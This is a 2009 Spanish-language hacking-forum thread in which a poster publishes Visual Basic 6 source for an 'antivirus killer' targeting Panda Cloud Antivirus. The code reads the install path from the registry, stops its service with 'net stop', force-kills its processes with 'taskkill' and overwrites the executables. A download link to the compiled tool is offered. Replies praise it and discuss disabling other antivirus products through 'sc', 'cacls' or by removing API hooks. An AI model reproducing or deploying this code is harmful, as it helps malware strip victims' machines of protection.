elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware
| | |-+  Abril negro (Moderadores: Man-In-the-Middle, WHK, kub0x, fary)
| | | |-+  Prueba de concepto - Anti Cloud Antivirus (Panda)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Prueba de concepto - Anti Cloud Antivirus (Panda)  (Leído 19,691 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Prueba de concepto - Anti Cloud Antivirus (Panda)
« en: 5 Mayo 2009, 23:27 pm »

Bueno, primero quiero aclarar que este programa/source no entra dentro del "concurso de desarrollo de malware de Abril Negro 2009". Pero sí entra dentro del boletín para Abril Negro 2009, como prueba de concepto...

Anti Cloud Antivirus by MadAntrax :P

He diseñado una simple función que aprovecha los comandos típicos de Windows (taskkill, net, etc...) y los he aplicado en forma de bucles FOR y Sleep's para generar un AV-Killer genérico. En éste caso lo he diseñado para el nuevo Cloud Antivirus de Panda



Que es Cloud Antivirus?

Es el nuevo antivirus gratuito desarrollado por Panda, usando un método de programación que evita sobrecargar la CPU del usuario (Cloud Computing). He analizado el AV y he decidido crear un AV Killer para "matar" el nuevo producto de Panda.

:http://www.cloudantivirus.com/default.aspx?lang=spa
:http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube

El source del programa es el siguiente:

modAntiCloudAV.bas
Código
  1. Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
  2.  
  3. Function StopService(ByVal sName As String) As Boolean
  4.    On Error Resume Next
  5.    Dim i As Integer
  6.  
  7.    For i = 1 To 3
  8.        Shell "net stop " & sName, vbHide
  9.        Sleep 250
  10.    Next i
  11.    Sleep 1000
  12.    DoEvents
  13.    StopService = True
  14. End Function
  15.  
  16. Function DestroyFile(ByVal sFileName As String, ByVal sFilePath As String) As Boolean
  17.    On Error Resume Next
  18.    Dim i As Integer
  19.  
  20.    For i = 1 To 3
  21.        Shell "taskkill /F /IM " & sFileName, vbHide
  22.        Sleep 250
  23.    Next i
  24.    Sleep 1000
  25.    DoEvents
  26.  
  27.    For i = 1 To 3
  28.        Open sFilePath For Output As #1
  29.            Print #1, "destroyed!"
  30.        Close #1
  31.        Sleep 10
  32.    Next i
  33.    DoEvents
  34.    DestroyFile = True
  35. End Function
  36.  

Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...). Para usar el módulo y matar CloudAV se utiliza así:

Código
  1. Private Sub CommandXP1_Click()
  2.    On Error Resume Next
  3.  
  4.    Dim WShell As Object
  5.    Dim CloudPath As String
  6.  
  7.    CommandXP1.Enabled = False
  8.    Set WShell = CreateObject("WScript.Shell")
  9.        CloudPath = WShell.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Panda Security\Nano Av\Setup\Path")
  10.    Set WShell = Nothing
  11.  
  12.    If CloudPath = "" Then
  13.        MsgBox "No se ha encontrado Cloud Antivirus instalado en el sistema", vbExclamation, "Anti-CloudAV"
  14.    Else
  15.        StopService "NanoServiceMain"
  16.        DoEvents
  17.        DestroyFile "PSUNMain.exe", CloudPath & "PSUNMain.exe"
  18.        DoEvents
  19.        DestroyFile "PSANHost.exe", CloudPath & "PSANHost.exe"
  20.        DoEvents
  21.        DestroyFile "PSANToManager.exe", CloudPath & "PSANToManager.exe"
  22.        DoEvents
  23.        'CloudAV destroyed
  24.        MsgBox "Proceso finalizado correctamente, comprueba si tu CloudAV sigue funcionando", vbInformation, "Anti-CloudAV"
  25.    End If
  26.    CommandXP1.Enabled = True
  27. End Sub
  28.  

El source es mejorable, se puede modificar para que no haga tantos bucles ni tantos sleep's y mejorar la rápidez. Pero como es una prueba de concepto... prefiero dejarlo así para evitar posibles copy&paste de noob's. Los que quieran usar ésta técnica tendrán la oportunidad de programarse correctamente un modulo más eficiente (evitar usar el objecto WScript, no usar Shell, cifrar las String's, control de errores, etc...)

;)

LINK DE DESCARGA: antiCloudAV (Fichero Compilado + Source en VB6)

Saludos.


« Última modificación: 5 Mayo 2009, 23:34 pm por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #1 en: 6 Mayo 2009, 00:02 am »

Pues añadido ;)
http://foro.elhacker.net/analisis_y_diseno_de_malware/abril_negro_2009-t250385.0.html;msg1208337#msg1208337

Hay que ver lo calentito que está el subforo últimamente xD
Buen trabajo ;)


En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #2 en: 6 Mayo 2009, 04:12 am »

Es "acojonante" (como dice un amigo)  ver como puedes detener facilmente un antivirus desde "sc" o desde "net", detener el servicio, eliminarlo del arranque y ya.

No se si habrá algún antivirus que deniege la detención del servicio aunque es dificil ya que si eres admin y no puedes detener un servicio propio de tu pc entonces pierdes el control y tendrias que pasar a system cosa que ahora desde xp es muy fácil de hacer.

De esta misma forma hasta puedes detener sistemas de proteccion que no necesariamente sea un antivirus, como por ejemplo un sistema de seguridad de internet, firewall, sniffer, etc.

Con "cacls" puedes asecinar de igual forma a los antispywares que no están corriendo siempre.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #3 en: 6 Mayo 2009, 04:36 am »

La verdad que si es increíble que en ocasiones sea tan sencillo detener un AV, buen trabajo Mad  :D, y creo que no has elegido mejor AV para la prueba de concepto, ya que esta recien salido del horno y es una apuesta a los "nuevos" AV  :-X

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Arkangel_0x7C5


Desconectado Desconectado

Mensajes: 361



Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #4 en: 6 Mayo 2009, 04:49 am »

Es "acojonante" (como dice un amigo)  ver como puedes detener facilmente un antivirus desde "sc" o desde "net", detener el servicio, eliminarlo del arranque y ya.

No se si habrá algún antivirus que deniege la detención del servicio aunque es dificil ya que si eres admin y no puedes detener un servicio propio de tu pc entonces pierdes el control y tendrias que pasar a system cosa que ahora desde xp es muy fácil de hacer.

El nod32 v4 no se deja matar asi y el karpesky tampoco. habra mas pero yo solo se esos. La forma de matarlos es quitando los hook en las apis de terminar procesos

Saludos
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #5 en: 6 Mayo 2009, 12:21 pm »

El nod32 v4 no se deja matar asi y el karpesky tampoco. habra mas pero yo solo se esos. La forma de matarlos es quitando los hook en las apis de terminar procesos

Exacto, me cito a mi mismo:

Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...).

Por eso, y aprovechando la ocasión, recomiendo utilizar sistemas de protección basados en drivers (a nive de Ring0 mejor) y Hook's. Como por ejemplo Kaspersky, NOD32, AVG y Avira... los demás son una m1erda de AV.

Saludos.
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #6 en: 6 Mayo 2009, 15:36 pm »

Buen PoC Mad ;D

No conocía ese AV :P

Yo ahora mismo estoy trabajando en un método genérico de matar cualquier AV... si saber nombre de procesos ni ruta de instalación ni información especifica de un AV... por ahora solo lo he probado con NOD32 (v3) y Avira (Antivir 2009) (Los únicos que tengo instalados en las VM :xD)

Cualquier novedad os hago un tema :xD :xD

Saludos ;)

PD: Siempre me falta tiempo >:(
En línea

XcryptOR

Desconectado Desconectado

Mensajes: 228



Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #7 en: 6 Mayo 2009, 19:27 pm »

eso me gustaria verlo sin procesos, sin consultar en el registro o cero informacion del av. no creo , bueno habra que esperar. mmm mi av killer termina todos y absolutamente todos los avs.
En línea



Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #8 en: 6 Mayo 2009, 20:10 pm »

eso me gustaria verlo sin procesos, sin consultar en el registro o cero informacion del av. no creo , bueno habra que esperar. mmm mi av killer termina todos y absolutamente todos los avs.
Todavía estoy desarrollando el concepto... teóricamente es posible... luego vienen los problemas claro... :xD

Tu AV Killer utiliza los nombres de procesos y las Keys del registro que almacenan el Path?
En línea

Arkangel_0x7C5


Desconectado Desconectado

Mensajes: 361



Ver Perfil
Re: Prueba de concepto - Anti Cloud Antivirus (Panda)
« Respuesta #9 en: 7 Mayo 2009, 20:27 pm »

eso me gustaria verlo sin procesos, sin consultar en el registro o cero informacion del av. no creo , bueno habra que esperar. mmm mi av killer termina todos y absolutamente todos los avs.
Todavía estoy desarrollando el concepto... teóricamente es posible... luego vienen los problemas claro... :xD

Tu AV Killer utiliza los nombres de procesos y las Keys del registro que almacenan el Path?
cual seria esa teoria?

Saludos
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines